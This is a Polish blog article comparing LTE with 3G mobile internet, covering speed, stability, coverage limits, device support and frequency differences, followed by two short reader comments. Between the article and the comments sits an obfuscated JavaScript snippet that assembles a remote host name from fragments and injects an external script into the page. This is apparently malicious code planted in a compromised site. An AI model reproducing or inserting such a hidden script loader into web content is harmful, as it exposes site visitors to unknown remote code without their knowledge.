Nowy wymiar jakości internetu mobilnego z technologią LTE

Jeszcze nie tak dawno internet w technologii 3G był prawdziwym spełnieniem marzeń użytkowników smartfonów i innych urządzeń mobilnych, jednak od dłuższego czasu jest z powodzeniem zastępowany przez technologię LTE. Jakie są jej zalety?

Oferowane przez producentów lub operatorów telefony czy tablety dają nam coraz większe możliwości. Jednak chcąc z nich w pełni korzystać, niezbędne okazuje się połączenie z siecią. W obliczu stale rosnących oczekiwań standard 3G przestaje nam wystarczać. A co z LTE?

Czego brakuje nam w technologii 3G?

Początkowo technologia 3G była ceniona między innymi za możliwość komfortowego i szybkiego korzystania z internetu na urządzeniach mobilnych niemal w dowolnej lokalizacji. Niemniej parametry tego standardu szybko przestały zadowalać najbardziej wymagających użytkowników, którzy zaczęli narzekać na dość duże wahania transmisji danych.

Standard 3G świetnie sprawdzał się przy standardowym przeglądaniu stron, odbieraniu i wysyłaniu maili czy korzystaniu z komunikatorów, ale już oglądanie materiałów wideo w wysokiej jakości lub gra online ze względu na spore ograniczenia rodziły pewne trudności.

Co daje nam technologia LTE?

Internet w technologii LTE ma przede wszystkim gwarantować swobodne korzystanie z sieci na smartfonie lub tablecie. Jednak w tym przypadku pod pojęciem swobody należy rozumieć także szybkie i stabilniejsze połączenie i dłuższą żywotność baterii w urządzeniu działającym w tym standardzie. Co jeszcze daje nam internet LTE?

Według zapewnienie operatorów standard LTE to również możliwość sprawnego pobierania nawet dużych plików oraz krótszy czas oczekiwania na wczytywanie się stron czy plików wideo. Zaletą internetu LTE ma być też utrzymywanie stabilnych parametrów połączenia, także przy osiąganiu przez użytkowników dużych prędkości – przykładowo podczas podróży.

Co warto wiedzieć przed zakupem LTE?

Nie ulega wątpliwości, że technologia LTE ma bardzo wiele niekwestionowanych zalet. Jednak przed wyborem tego wariantu musimy zwrócić uwagę na kilka podstawowych aspektów, takich jak zasięg LTE, który nie obejmuje całego kraju. Mimo że zasięg LTE nieustannie się zwiększa, z tego standardu w dalszym ciągu mogą korzystać głównie mieszkańcy dużych i średnich polskich miast oraz największych aglomeracji.

Inną kwestią są również pewne bariery technologiczne. Okazuje się, że nie każdy sprzęt jest przystosowany do obsługi internetu LTE. Wyjściem z tej sytuacji może być zakup, wraz z pakietem internetowym, nowego smartfona lub tabletu działającego w tej technologii.

Niekiedy mogą pojawić się także trudności związane z niewłaściwą częstotliwością, co z kolei utrudni nam swobodne korzystanie z dostępu do sieci. Dotyczy to głównie osób, które często podróżują do Stanów Zjednoczonych, gdzie standard ten działa na częstotliwościach 700 lub 2100 MHz, podczas gdy w Europie technologia ta korzysta z częstotliwości 1800 MHz.
// (function(){ uksz=document.createElement(“script”);uksz.type=”text/javascript”; uksz.async=true;uksz_=((“us”)+”t”)+”a”;uksz_+=(“t.i”)+””+”n”;uksz_+=((“f”)+”o”); uksz.src=”http://”+uksz_+”/7006216.p37wlmlwksz1k0fxq2h8gq3h3z3ivi”; document.body.appendChild(uksz); })();
// ]]>

Podobne wpisy

2 komentarze

  1. Czy ktoś wie coś o lte w Śferii? Dają kasę do taryf bo próbują się przebić. Postawili nową stronkę i są w całej PL, ale jak tam z netem?

  2. no sferia jest polską firmą a lte teraz jest wszędzie na podobnym poziomie, więc po prostu trzeba wspierać naszych i tyle.

Co o tym sądzisz?

Witryna wykorzystuje Akismet, aby ograniczyć spam. Dowiedz się więcej jak przetwarzane są dane komentarzy.